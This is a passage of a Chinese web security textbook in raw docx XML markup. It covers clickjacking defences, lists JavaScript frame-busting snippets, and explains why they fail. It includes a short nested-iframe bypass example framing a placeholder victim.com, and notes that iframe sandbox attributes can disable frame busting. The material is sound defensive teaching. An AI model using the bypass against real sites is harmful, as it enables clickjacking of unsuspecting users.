            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://vimeo.com/17648348</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="386" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="5.6.2  X-Frame-Options" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
        <w:pict>
          <v:shape style="width:411.15pt;height:140.050pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="28" w:right="4142" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top.location.replace(document.location) top.location.replace('URL') top.location.href = document.location top.location.replace(window.location.href) top.location.href = location.href self.parent.location = document.location</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="266" w:lineRule="auto" w:before="4"/>
                    <w:ind w:left="28" w:right="3871" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>parent.location.href = self.document.location top.location.href = self.location top.location =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-4"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>window.location</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="0"/>
                    <w:ind w:left="28" w:right="2126" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>top.location.replace(window.location.pathname) window.top.location = window.self.location setTimeout(function(){document.body.innerHTML='';},1); window.self.onload = function(evt){document.body.innerHTML='';} var url = window.location.href; top.location.replace(url)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="146"/>
        <w:ind w:left="203" w:right="125" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>但是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>也存在一些缺陷。由于它是用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>写的，控制能力并不是特别强， 因此有许多方法可以绕过它。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>比如针对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>parent.location </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，就可以采用嵌套多个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的方法绕过。假设</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.983799pt;width:411.15pt;height:30pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3904;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="8"/>
                    <w:ind w:left="266" w:right="4622" w:hanging="238"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>if ( top.location != self.location) { parent.location = self.location ;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:w w:val="100"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="72"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>那么通过以下方式即可绕过上面的保护代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:7.86375pt;width:411.15pt;height:40pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3928;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>Attacker top frame:</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="18"/>
                    <w:ind w:left="28" w:right="5294" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;iframe src="attacker2 .html"&gt; Attacker sub-frame:</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;iframe </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId66">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Courier New"/>
                        <w:sz w:val="16"/>
                      </w:rPr>
                      <w:t>src="http://www.victim.com"&gt;</w:t>
                    </w:r>
                  </w:hyperlink>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="77"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>此外，像 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>HTML 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>属性、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>属性等，都可以限制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="73"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>页面中的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>脚本执行，从而可以使得 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>frame busting </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>斯坦福的</w:t>
      </w:r>
      <w:hyperlink r:id="rId67">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>G</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>av</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-6"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>R</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-4"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>d</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>d</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>等人总结了一篇关于“攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-23"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-75"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>：“</w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>B</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>n</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>g</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>f</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>r</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>m</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>e</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId68">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>b</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>u</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-2"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>n</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="0"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>g</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>a</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
            <w:spacing w:val="-1"/>
            <w:w w:val="99"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
